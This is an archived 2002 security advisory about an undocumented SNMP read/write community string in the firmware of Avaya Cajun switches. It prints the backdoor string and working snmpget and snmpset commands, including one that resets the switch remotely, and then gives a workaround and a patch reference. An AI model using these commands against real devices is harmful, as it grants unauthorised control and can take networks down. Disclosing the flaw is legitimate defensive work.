6th Aug 2002 [SBWID-5598]
COMMAND
AVAYA Cajun firmware hidden SNMP community allows remote control
SYSTEMS AFFECTED
Avaya Cajun P330T software version 3.8.2 and 3.9.1
Avaya Cajun P333R software version 3.8.1 and 3.9.1
Additionaly firmware for P130, M770-ATM and M770 Supervisor (M-SPX, M-SPS)
was found to be vulnerable.
The vulnerability is also present on P333R router interfaces
PROBLEM
Jacek Lipkowski [sq5bpf@andra.com.pl] of Andra Co. Ltd.
[http://www.andra.com.pl] says :
There exists an undocumented SNMP r/w community string in firmware for
Avaya Cajun P33x series hardware. This allows anyone having SNMP access
to the device to administer it. Various Cajun firmware contains an
undocumented community r/w string NoGaH$@! To test try:
sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = AsnNull
sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' system.sysName.0 s 'Hello there :)'
system.sysName.0 = Hello there :)
sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = Hello there :)
Reset a Cajun switch remotely (fun party trick):
sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' .1.3.6.1.4.1.81.7.7.0 i 1
enterprises.81.7.7.0 = 1
P333R router :
sq5bpf@hash:~$ snmpget 192.168.0.4 'NoGaH$@!' system.sysDescr.0
system.sysDescr.0 = Avaya Inc. - P333R , SW version 3.9.1 , CS 2.4
SOLUTION
Workaround
==========
restrict SNMP access using the 'set allowed managers' command
Patch
=====
Avaya support site http://support.avaya.com
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
